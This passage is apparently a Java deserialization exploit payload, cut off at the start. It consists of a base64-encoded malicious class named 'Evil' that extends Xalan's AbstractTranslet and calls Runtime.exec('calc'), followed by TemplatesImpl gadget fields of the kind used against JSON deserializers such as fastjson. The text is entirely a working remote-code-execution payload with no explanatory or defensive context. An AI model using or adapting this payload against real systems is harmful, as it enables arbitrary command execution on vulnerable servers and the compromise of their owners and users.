5oCB5Luj56CB5Z2XBwBGDABHAEgBAARjYWxjDABJAEoBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MACIASwEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAA4ADwAAAAAABQABABAAEQACABIAAAA/AAAAAwAAAAGxAAAAAgATAAAABgABAAAADgAUAAAAIAADAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABABkAGgACABsAAAAEAAEAHAABABAAHQACABIAAABJAAAABAAAAAGxAAAAAgATAAAABgABAAAAEwAUAAAAKgAEAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABAB4AHwACAAAAAQAgACEAAwAbAAAABAABABwAAQAiACMAAQASAAAASwACAAEAAAAVKrcAAbIAAhIDtgAEsgACEgW2AASxAAAAAgATAAAAEgAEAAAAIwAEACAADAAkABQAJQAUAAAADAABAAAAFQAVABYAAAABACIAJAABABIAAABVAAIAAgAAABUqtwABsgACEgO2AASyAAISBrYABLEAAAACABMAAAASAAQAAAApAAQAIAAMACoAFAArABQAAAAWAAIAAAAVABUAFgAAAAAAFQAlACYAAQAIACcAIwABABIAAAByAAMAAQAAAByAAISB7YABLgACBIJtgAKV6cADUu7AAxZKrcADbxAAEACAARABQACwADABMAAAAaAAYAAAAWAAgAGAARABsAFAAZABUAGgAeAB0AFAAAAAwAAQAVAAkAKAApAAAAKgAAAAcAAlQHACsJAAEALAAAAAIALQ\],_name:xbb,_tfactory:{},\_outputProperties\:{}}}
